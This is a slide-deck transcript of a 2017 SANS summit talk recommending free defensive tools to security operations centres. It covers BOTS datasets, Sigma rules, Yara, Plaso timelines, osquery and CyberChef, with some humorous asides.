Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

10(?) holiday gifts for the SOC who has everything

  • 1. Ten(?) Holiday Gift Ideas for the SOC Who Has Everything Dave Ryan @ SANS SIEM & Tactical Analytics Summit November 2017
  • 2. Disclaimer 2 During the course of this presentation, we may make forward looking statements regarding future events or the expected performance of the company. I often lie. Maybe this is a lie. Wik Alsø wik Alsø alsø wik Wi nøt trei a høliday in Sweden this yër? See the løveli lakes The wøndërful telephøne system And mäni interesting furry animals The characters and incidents portrayed and the names used in this Presentation are fictitious and any similarity to the names, characters, or history of any person is entirely accidental and unintentional. Signed RICHARD M. NIXON Including the majestik møøse A Møøse once bit my Marcus... No realli! He was Karving his initials on the møøse with the sharpened end of an interspace tøøthbrush given him by Svenge – his brother-in-law – a Canadian dentist and star of many Norwegian møvies: "The Høt Hands of an Canadian Dentist", "Fillings of Passion", "The Huge Mølars of Horst Nordfink"... In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. Splunk undertakës no øbligation either to develøp the features or functionality described or to include any such feature or functionality in a future release.
  • 3. • 17 years of cyber security experience • Current role on Security Practice team focuses on incident/breach response, threat intelligence, and research • Also investigating why printers are so insubordinate ಠ_ಠ 3 Staff Security Strategist Minster of the OODAloopers @meansec # whoami > Ryan Kovar CISSP,MSc(Dist)
  • 4. - 20+ years IT and security - Information security officer, security architect, pen tester, consultant, SE, system/network engineer - Former SANS Mentor - Co-creator of Splunk Boss of the SOC Security Architect @splunk @daveherrald # whoami > Dave Herrald CISSP, GIAC G*, GSE #79
  • 5.
  • 6.
  • 7. We use Splunk But you don’t have to!
  • 9. Florian Roth • Twitter: @cyb3rop • Github: https://github.com/Neo23x0 • Currently employed at: https://www.bsk-consulting.de • Sigma author • Yara signature creator extraordinaire
  • 11. Test your SIEM with Realistic Data
  • 12. BOTS Data Is Free • Splunk Boss of the SOC is a realistic, blue-team CTF • BOTS Version 1 debuted in September 2016 • Data set has been open-sourced. (CCO license) • Available as pre-indexed Splunk data, JSON, and CSV https://github.com/daveherrald/botsv 1
  • 13. BOTS Data Is Realistic • Realistic attack data • Realistic background noise • Includes 22 data types • Windows events • Microsoft Sysmon • Windows registry • Wire data (HTTP, DNS, DHCP, etc.) • Suricata • Firewall
  • 15. SIGMA Generic Signature Format for SIEM • Developed by Florian Roth and Thomas Patzke • https://github.com/Neo23x0/sigma What’s in the box? • Rule specification • Open repository of signatures • A Python converter for different SIEM systems
  • 16. SIGMA – Preparing to test against BOTSv1 data • Focus on Sysmon data for this test - About 46 of 148 Sigma rules at time of test • Need to convert Sigma Sysmon rules to Splunk searches • I used sigmac.py manually, included with Sigma • Recommend the excellent TA-Sigma- Searches add-on for Splunk - https://github.com/dstaulcu/TA-Sigma- Searches - Finished product - Also includes the PowerShell wrapper for sigmac.py that takes care of a lot of messy details
  • 17. SIGMA – Test against BOTSv1 data set Success! • sysmon_office_macro_cmd.yml • sysmon_office_shell.yml • sysmon_susp_execution_path_webserver.yml • sysmon_susp_net_execution.yml • sysmon_webshell_spawn.yml Follow-up • More hits with other Sigma rules? • Contribute new rules to Sigma
  • 19. The Practice of Network Security Monitoring, Richard Betjli
  • 20.
  • 21.
  • 22. Then one day you have an “incident”
  • 23.
  • 24.
  • 26.
  • 27.
  • 28. Yara on the local host
  • 29. Now run Yara on the local host
  • 30. Yara on the local host *thanks Florian!
  • 31. Yara in da SIEM
  • 32. Yara in da SIEM
  • 33. Integration into the DFIR world
  • 36. Supertimeline in a SIEMStore and search over multiple timelines
  • 37. Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types
  • 38. Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges
  • 39. Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges Ad-hoc search
  • 40. Supertimeline in a SIEMStore and search over multiple timelines Extract the Supertimeline Source Types Specify time ranges Ad-hoc search Familiar color coding
  • 41. Resources Supertimeline(Plaso) Splunk Apps • https://github.com/daveherrald/TA_plaso-add-on-for-splunk • https://github.com/daveherrald/SA_plaso-app-for-splunk Earlier work from Nick Klein • https://www.youtube.com/watch?v=xe0qJriD7aM
  • 45. Make a SIEM rule taxonomy!
  • 47. • “4” Indicates it is in the 4th stage of the kill chain • “002” Indicates it is the 2nd rule written in ”4” category • “EXP” Indicates it is in the ’Exploit’ category • Lastly, the name of the rule Don’t reinvent the wheel https://conf.splunk.com/files/2016/slides/maturing-workdays-soc-with-splunk.pdf
  • 48. Don’t reinvent the wheel https://conf.splunk.com/files/2016/slides/maturing-workdays-soc-with-splunk.pdf
  • 50.
  • 51. Current osquery Capability with Splunk •Schedule osquery queries •Log results locally •Monitor with Universal Forwarder •Analyze with Splunk •We include this in BOTS v2 if you want to see it in action •https://splunkbase.splunk.com/app/3278 /
  • 52.
  • 54. Osquery clients directly connected to Splunk
  • 55. Osquery clients directly connected to Splunk Multiple endpoints.
  • 56. Osquery clients directly connected to Splunk Multiple endpoints. Active connections.
  • 57. Osquery clients directly connected to Splunk Multiple endpoints. Active connections. Windows, Linux, OSX
  • 59. Your analysts can now query an endpoint, on-demand… Choose from saved queries, like Listening Ports
  • 60. Any connected endpoint Run the query on the endpoints you choose.
  • 61. With results available in seconds…
  • 62. From all the queried clients…
  • 63. Query results are stored for future analysis
  • 64. Details •No Splunk software on the endpoint, osquery only •TLS transport •Collects both on-demand and scheduled query results •GOTO: Disclaimer
  • 66. OK… So what’s a TIP again? YETIAn open source malware and threat repository that leverages other open source software to create a unified tool for analysts and security experts engaged in threat defense. Malware Information Sharing Platform (MISP) allows organizations to share information about malware and their indicators. MISP users benefit from the collaborative knowledge about existing malware or threats. Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository “Threat Intelligence Platform”
  • 67. A SIEM acting as a TIP
  • 68. A SIEM acting as a TIP
  • 69. The Practice of Network Security Monitoring, Richard Betjli
  • 70.
  • 72. Optimizing Analysis with CyberChef • Developed and maintained by GCHQ • Open source, Apache 2.0 License and Crown Copyright • https://github.com/gchq/CyberChef • Convert virtually any data format to any other • Web based • Processing is performed locally using JavaScript in the browser • Easy to use, powerful, programmable, extensible
  • 76. CyberChef Recipes (encodings aplenty and more)
  • 77. CyberChef Recipes (Holiday Playlist) Encodings • Base64 • Hexdump • URL/HTML Entity Encryption • AES • 3DES • RC4 • XOR Public Key Crypto • Parse X509 • PEM to DER Logical • AND/OR/NOT/X OR • Bit shift • Endian flip Networking • Parse UA string • Parse URI • NETBIOS Encoding Languages • Dozens • Unicode un- escaping Text Manipulation • Upper, lower • Sort, count, uniq • Head, tail • Regex Extractions • IP • File names • Domains • EXIF Compression • Zip, gzip, bz2 • Tar Hashing • SHA1/SHA2/Md5 • HMAC • CRC
  • 79. Takeaways • Get some “SIEMsipration”! • Think outside of “Alerts and Events • Use third-party open source tools t “accelerate” your bicycle • Automate the mundane. Investigat the interesting.

Editor's Notes

  1. Learned System Administration in the US Navy Worked in the UK/US in public/private sector Most recently at DARPA using Splunk Has a masters degree from University of Westminster Focuses on Incident response, Threat intel, dry humor,
  2. Some gifts are better than others Car vs SOC(k) “Abstract different than talk? Why? Research! People needed the stuff we talk about here more than they needed ADPS (another damn (powershell|python) script” “We’re here to inspire you not give you answers”
  3. Forensics detail if can add context to a SIEM investigation Triggering forensics gathering as a workflow
  4. I constantly hear that customers want to manage their threat intelligence with their SIEM. They want their SIEM to act as a TIP
  5. But… it never ends up well…. Think about using TIPS 
  6. 5
  7. 5